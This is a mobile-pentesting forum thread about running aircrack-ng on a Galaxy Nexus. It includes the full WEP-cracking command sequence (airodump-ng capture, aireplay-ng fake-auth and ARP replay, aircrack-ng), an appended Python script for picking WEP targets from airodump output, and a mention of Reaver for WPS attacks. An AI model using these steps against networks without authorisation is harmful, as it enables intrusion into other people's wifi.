XDA Developers Android and Mobile Development Forum

[KERNEL] Aircrack-ng on Galaxy Nexus w/ AWUS036H usb wifi adapter (RTL8187 drivers)

michaelmotes (Senior Member - OP), #1
(Last edited by michaelmotes; 15th April 2013 at 08:25 PM.) Reason: Added modified kernel module attachment

For a while now I have been wanting to run aircrack on my galaxy nexus so as to have a mobile pentesting device.

So, I finally got it working and thought I would post how. This is not a task for the terminally challenged.
  1. Install BackTrack 5 ARM. The latter is a Linux environment designed for pentesting. On a mobile device the easiest way to install it is by chrooting into the mounted img, running on top of the mobile device's kernel.

  2. Since most people seem to think aircrack is unusable on a mobile ARM device, it is not included in the BackTrack 5 Linux distro above, so you will need to download it manually once you have BackTrack up and running.

    Here are the commands to do so:
    #!/bin/bash
    # Aircrack-ng installer for BackTrack 5 on Android
    # By Justin Barrick aka th3p4tri0t
    set -e   # stop at the first failing step instead of carrying on

    # install dependency for libssl-dev
    apt-get install -y zlib1g-dev

    # install libssl-dev (armel build fetched from Launchpad)
    wget http://launchpadlibrarian.net/644124...u8.6_armel.deb
    dpkg --install libssl-dev_0.9.8k-7ubuntu8.6_armel.deb
    rm libssl-dev_0.9.8k-7ubuntu8.6_armel.deb

    # get the BackTrack source package and build aircrack-ng from it
    apt-get install -y source-aircrack-ng
    cd /var/backtrack/sources/aircrack-ng/1.1/bt9/upstream-sources/
    tar -xzf aircrack-ng.tar.gz
    cd aircrack-ng/
    make
    make install

    # set path variable; single quotes so $PATH is expanded when .bashrc is
    # read, not baked into the file with today's value
    echo 'export PATH=$PATH:/usr/local/sbin' >> ~/.bashrc
    export PATH=$PATH:/usr/local/sbin

  3. Now, the hard part. Or at least the part that took me forever to discover. You need the drivers for the AWUS036H to be insmod'ed into the kernel. You can accomplish this by obtaining your kernel source and the driver source, which is part of the compat-wireless package; more specifically, the AWUS036H uses the rtl8187 chipset. Then, you cross compile those two sources to obtain rtl8187.ko, eeprom_93cx6.ko, and mac80211.ko. Then insmod those kernel modules into your kernel (insmod rtl8187.ko). The process is explained here. One can also recompile the entire kernel instead, and include the modules as built-in drivers. However, compiling kernel drivers can be difficult (toolchains, kernel source, etc), so luckily, I found a Galaxy Nexus kernel that already has the modules built-in: it is franco.Kernel R140 with modules added.

    ***Update: franco.Kernel R200 with RTL8187 modules added, and R248 for JellyBean 4.1.1 with RTL8187 drivers, so Aircrack-ng is now compatible with JellyBean! Also, R140 is no longer available, but R200 is and has the modules needed.


    Beware, the kernel R200 needs ICS 4.0.4 installed to work properly, and R248 is built for JB 4.1.1.

    ***Update 04/11/2013:
    I couldn't find any kernels with the RTL8187 drivers for JB 4.2.2, so I built one myself. The kernel is a modified franco.Kernel R370. I didn't package it into a flashable zip, because I find it just as easy to hook my phone to my computer and use fastboot (fastboot flash boot bootJB422-RTL8187.img). The kernel image is attached below. I have been running it for about 4 days now without issue. I actually find it is the most stable version yet. I was able to play N64oid while running airodump-ng and aireplay-ng. File attached below.
    ***Update 04/15/2013:
    I looked into getting more of the aireplay-ng attacks to work properly with the RTL8187 drivers. There had been some complaints about the fragmentation attack not working and negative one always being returned as the channel for mon0. So, I found two patches for those issues on the aircrack-ng site, applied them to the franco.Kernel r370 with RTL8187, and recompiled. Now we have a fully functional aircrack-ng RTL8187 driver.


    Once you flash the kernel, using the flashable zip and CWM or fastboot flash, BackTrack will be able to recognize the attached wifi adapter... once you mount the USB bus in BackTrack. And, of course, this needs an OTG USB host cable.

  4. The final step before learning how to use aircrack-ng is:
    1. Open a terminal and load BT5. You can load the 'ui' and use a VNC client to connect to the X server desktop if you want, but I have found it is easier to just use the chroot shell in the Android terminal emulator.
    2. Open another Android terminal window, and type:

        su
        mkdir -p /data/local/bt/dev/bus/usb
        mount -o bind /dev/bus/usb /data/local/bt/dev/bus/usb

    3. In the new Android terminal window, start the BT5 shell (startbt), then type:

        lsusb

    You should see at least one device, the USB root, and whatever device you have plugged in to the OTG cable, if any.

    A note to remember: I re-performed this guide after formatting my phone and got stuck here. lsusb didn't list anything. I rebooted my phone, tried to start BT5 and mount the USB again, and it worked. I rebooted, started BT5, tried lsusb without binding USB and it was blank, as it should be; bound USB back in another terminal window, returned to BT5, tried lsusb, and the root hub displayed.

Now, plug in the AWUS036H and type: airmon-ng
And you should see the device listed.


Read here for how to run aircrack, or view here.

Essentially the commands are:
lshw -disable dmi
(this should list the attached wifi card under NETWORK; my RTL8187 was wlan1)
ifconfig
(you should see wlan1 listed; if not, type "ifconfig wlan1 up" and retype "ifconfig")
airmon-ng start wlan1
airodump-ng mon0

copy BSSID and CHANNEL

New android terminal with BT5 shell (startbt): airodump-ng -w wep -c CHANNEL --bssid BSSID mon0
New android terminal with BT5 shell (startbt): aireplay-ng -1 0 -a BSSID mon0
New android terminal with BT5 shell (startbt): aireplay-ng -3 -b BSSID mon0

After ~50,000 packets collected:
New android terminal with BT5 shell (startbt): aircrack-ng wep-01.cap


To the purpose, with this, if your friend or mom or just some complete stranger forgets their wep key to their network, all they need to do is call you and you can just drive by, plug your wifi adapter into your phone, chroot to BT5 and aircrack their password for them, in a matter of 5 to 10 minutes.


WARNING!!!: In my initial aircrack run on my Galaxy Nexus, I cracked a WEP key in about 5-10 minutes. I was happy, happy, happy. Then, a ruinous moment occurred. Almost the very second aircrack-ng finished cracking the key, my phone came up with a low battery warning. I was using an AWUS036H wifi adapter and it was draining my battery fast; I had about 50% to begin and had the 14% warning hit me about 10 minutes in. Funny thing is the warning is usually 14%, but this time was 13%, go figure? Anyway, seconds after the warning my phone just blanks, turns off. I plug it in and reboot and the battery is at 0% and stuck there, so a word of warning:

An external wifi adapter may require more USB host juice than the battery can safely supply. I have seen people using powered hubs to circumvent draining the phone battery; I would definitely recommend the practice.

UPDATE: I plugged the phone into an AC charger and the battery finally charged (phew). For some reason, it wouldn't recharge on the USB cable after being so drained.
Attached Files
File Type: zip R225-JB.zip (3.37 MB)
File Type: img bootJB422-RTL8187.img (5.78 MB)
File Type: img boot.R370.JB422.RTL8187-aircrack-patched.img (5.78 MB)

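As an added example (not part of the original post and not aircrack-ng's own code): the "copy BSSID and CHANNEL" and "after ~50,000 packets" steps above can be read off the CSV that airodump-ng writes beside the capture when run with -w (wep-01.csv next to wep-01.cap). The script below parses that CSV, keeps only the WEP networks the aireplay-ng steps apply to, and reports each one's BSSID, channel and IV count against the 50,000 mark. The column layout is assumed to be the one airodump-ng writes (an access-point table, a blank line, then a station table), the sample rows are constructed, and the IV_GOAL constant is an assumption taken from the post's rule of thumb.

```python
#!/usr/bin/env python3
"""Pick WEP targets out of an airodump-ng CSV and report IV progress.

Added example; assumes the CSV layout airodump-ng -w writes.
"""
import csv
import io

# Rough IV count the post waits for before running aircrack-ng (assumption).
IV_GOAL = 50_000

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# an access-point table, a blank line, then a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-04-11 10:00:00, 2013-04-11 10:12:00,  6,  54, WEP , WEP, OPN,  -41,      900,    52310,   0.  0.  0.  0,   8, homewifi,
66:77:88:99:AA:BB, 2013-04-11 10:00:00, 2013-04-11 10:12:00, 11,  54, WPA2, CCMP, PSK,  -60,      850,        0,   0.  0.  0.  0,   6, office,
CC:DD:EE:FF:00:11, 2013-04-11 10:03:00, 2013-04-11 10:12:00,  1,  11, WEP , WEP, SKA,  -75,      300,     1204,   0.  0.  0.  0,   5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
22:33:44:55:66:77, 2013-04-11 10:01:00, 2013-04-11 10:12:00,  -50,     4100, 00:11:22:33:44:55,
"""


def parse_access_points(text):
    """Return one dict per access-point row, keyed by the CSV header names."""
    text = text.replace("\r\n", "\n")
    # The AP table ends at the first blank line; the station table follows.
    ap_section = text.split("\n\n", 1)[0]
    reader = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    rows = [r for r in reader if r]
    header = [h.strip() for h in rows[0]]
    aps = []
    for row in rows[1:]:
        row = [field.strip() for field in row]
        if len(row) < len(header):
            # airodump-ng rewrites the file while running; skip a torn line.
            continue
        aps.append(dict(zip(header, row)))
    return aps


def wep_targets(aps):
    """Keep only WEP networks; the post's aireplay-ng steps do not apply to WPA."""
    return [ap for ap in aps if ap["Privacy"] == "WEP"]


def iv_status(ap, goal=IV_GOAL):
    """Return (bssid, channel, iv_count, ready) for one access-point row."""
    ivs = int(ap["# IV"])
    return ap["BSSID"], int(ap["channel"]), ivs, ivs >= goal


def report(text, goal=IV_GOAL):
    """One line per WEP network: what to feed airodump-ng/aireplay-ng and whether
    enough IVs have been captured to try aircrack-ng."""
    lines = []
    for ap in wep_targets(parse_access_points(text)):
        bssid, channel, ivs, ready = iv_status(ap, goal)
        state = "ready for aircrack-ng" if ready else f"keep collecting ({goal - ivs} to go)"
        lines.append(f"{bssid}  ch {channel:>2}  ESSID {ap['ESSID']!r:12} IVs {ivs:>6}  {state}")
    return lines


if __name__ == "__main__":
    import sys
    # Pass the real CSV path (e.g. wep-01.csv) to read it; otherwise use the sample.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CSV
    print("\n".join(report(data)))
```

The ESSID column is split naively here; airodump-ng writes the ID-length column precisely because an ESSID can itself contain a comma, so a network named with a comma would need the length-based parse instead.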
auradefect (Member), #2
Is there a compatible wifi device that has the same chipset but with its own power supply (cord or battery)? If so that should help. I'm interested if someone can find one.

 
mthe0ry (Member), #3
This is amazing work. I used to do some network pen testing as part of my old job and there's a lot of work that goes into making a mobile setup even with a laptop involved. The fact you got this all working coherently on a phone is mind blowing to me. Huge props.

I have no experience with this manufacturer or ebay seller but through some googling I did find this product:

http://www.ebay.com/itm/Solar-Powere...item20b72a86b6

USB hubs in theory do not identify as normal USB devices and allow for pass through communication between connected devices. This one supplies external power as well. In other words, you may be able to connect both devices to this as it provides external power, and they can communicate without you having to rewrite any drivers.

However, be careful because some USB chipsets get confused if you try to use them as USB host but supply external power at the same time. So you may want to verify that is safe on the GNEX USB chipset.
 
auradefect (Member), #4
Anyone willing to order that hub and test it?

 
djxtabay (Member), #5
Wow just found that and will be testing it at home tonight.


I flashed the V140 kernel via recovery and I can't locate rtl8187.ko anywhere to move it to /data/local/modules

Where is it located once the kernel flashed?

Thanks!
 
michaelmotes (Senior Member - OP), #6
Once you install the R140 kernel mentioned, there is no need to insmod rtl8187.ko. The rtl8187 chipset support is compiled into the kernel boot.img.
 
michaelmotes (Senior Member - OP), #7
(Last edited by michaelmotes; 15th May 2012 at 11:05 PM.)
I use this external battery pack, and I spliced a spare USB cord with the cord from my wifi adapter, so it only draws juice from the battery pack.

When you cut open a usb cord there are four wires: red, black, green, and white.
Green and white are data, connect them to the cord going to the galaxy nexus.
Red is +5V, connect it to the +5 V or red cord going to the battery pack.
Black is common, connect it to both usb cords.
So, on the cord going to the battery pack, green and white are loose, and on the cord going to the gnex, red is loose.

Or, you could use the solar powered hub mentioned above. You will still need the modified kernel, as the hub will show up as an attached device, but so will whatever is connected to it. You can't communicate with a device, without the appropriate drivers.
 
bigrushdog (Recognized Developer), #8
I did the BT5 development for the Xoom. Reaver works too for h4xRing WPS. I made a module pack with about 100 modules for the Xoom. If this is something the gnex community is interested in, I'll see what I can do.
 
michaelmotes (Senior Member - OP), #9
bigrushdog, to be honest, during my trek to get this working, I nearly gave up and bought a XOOM, after seeing how well developed it was.
 
djxtabay (Member), #10
Quote (Originally Posted by bigrushdog):
    I did the BT5 development for the Xoom. Reaver works too for h4xRing WPS. I made a module pack with about 100 modules for the Xoom. If this is something the gnex community is interested in, I'll see what I can do.
Of course I would be interested!!!